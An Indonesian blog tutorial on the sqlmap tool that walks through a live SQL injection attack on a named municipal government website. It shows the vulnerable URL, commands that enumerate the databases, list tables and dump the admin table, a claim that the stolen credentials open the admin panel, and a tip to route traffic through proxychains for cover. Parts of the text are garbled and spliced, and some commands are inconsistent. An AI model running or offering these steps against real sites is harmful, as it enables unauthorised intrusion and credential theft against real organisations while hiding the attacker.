Basic Hacking: Menggali Informasi Database Website Dengan SQLMAP
Basic Hacking: Menggali Informasi Database Website Dengan SQLMAP
Halo! Kembali ketemu dengan saya. Kali ini saya akan share hasil belajar saya mengeksplorasi vulne SQLi suatu web dengan bantuan Tool SQLMAP di Gene0s Linux saya.
Well. Langsung saja. Pertama-tama, kita kenalan dulu dengan SQLMAP. “Tak kenal maka tak paham”
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-bandIntinya, SQLMAP adalah tool dengan Command line interface yang membantu anda melihat, mengubah dan mengeksekusi perintah SQL.
Sudah jelas, kan? Selanjutnya instalasi SQLMAP dapat dilakukan dengan cara dibawah ini:Untuk live demo, saya sertakan link youtubUntuk live demo, saya sertakan link youtube dibawah ini.e dibawah ini.
1. Dengan GitClone
Code:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
2. Dengan Aptitude
Code:
~# apt-get install sqlmap
Cara ini mengharuskan Om Heiker untuk memasang repo Backtrack
Oh, iya. Saya ga make OS Jendela, jadi, kalau pake itu OS, tutornya nyari sendiri, ya
Setelah instalasi rampung, mari kita eksploitasi kemampuan tool satu ini :bigsmile:
Command dasar untuk menjalankan SQLMAP
Code:Keterangan? Coba jalanin perintah ini
root@razor0ut:/pentest/database/sqlmap# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpall
Quote:
root@razor0ut:/pentest/database/sqlmap# ./sqlmap.py –hh :Dengan perintah diatas, maka kita akan mendapatkan daftar perintah yang sangat hebat :
Well, dengan ini pembukaannya cukup. Anda dapat mempelajari sendiri. Just be persistent, Om Heker.
Sekarang kita mulai menggunakan tool ini untuk mengeksplorasi kelemahan SQL Injection pada suatu website. Saya contohkan satu website .go.id yang saya intip dari update Facebo’ok teman saya :
Here’s the complete URLVulne ini sudah lama terdeteksi, namun para Admin tidak mengubris report dari pentester. Tolong jangan ditiru Om Heker. Dan mari kita mulai aksi kita.
Code:
www.pemkomedan.go.id/en/gallery_detail.php?idx=’9
Mencari nama Database
Langkah ini digunakan untuk mengetahui database yang digunakan website target. Yarp, ga mungkin, lah. Informasi yang ingin kita gali bisa kita dapat kalau ga tau nama database-nya :
Code:
[Directories to sqlmap]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” --random- --current-user -currrent-db
Hasilnya
Quote:
available databases [5]:
[*] *
[*] information_schema
[*] pemko_lelang
[*] pemko_medanmap
[*] pemko_pemko
[/code]
Hmmm. Setelah diliat dengan sepenuh hati, database pemko_pemko yang paling menarik. Mari kita bongkar isinya
FETCHING DATABASE PEMKO_PEMKO CONTENTS
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” --random-agent -D pemko_pemko --tables
Hasil dari command line diatas:
Quote:
Database: pemko_pemko
[62 tables]
+------------------------+
| admin |
| agenda |
| agenda_program |
Ada 62 tabel : tapi saya pilih yang isinya menarik : dan yang paling menarik adalah tabel “Admin” Sebelum basi, mari kita sikat tabel tersebut :
Here’s the command line you need
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” -random-agent -D pemko_pemko -T admin –columns
Kalau ga sabaran, langsung aja dumping database tersebut :bigsmile:
Here’s the command line
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” --random-agent -- -D ypt_v2 -T admin –dump
Hasil dari command line diatas adalah
Tambahan!!!
Code:Well, It’s done! Dengan username dan paswot tersebut, kita bisa masuk ke admin panel dan melakukan apapun! But I’d rather be wise and do nothing :
- salah satu alternatif agar proses penggalian informasinya menjadi sedikit aman, disarankan untuk menggabungkan proxy tools yang bernama "proxychains" kedalam sqlmap. [default di mesin BT].
caranya :
root@bt:/pentest/database/sqlmap# proxychains python sqlmap.py <syntax selanjutnya>
ada tutorial perintah dasar sqlmap
ReplyDeletesoalnya banyak
ingin menggunakan bingung
http://zonelinuxer.blogspot.com/2013/04/sqlmap-basic-usage.html
Deletemonggo om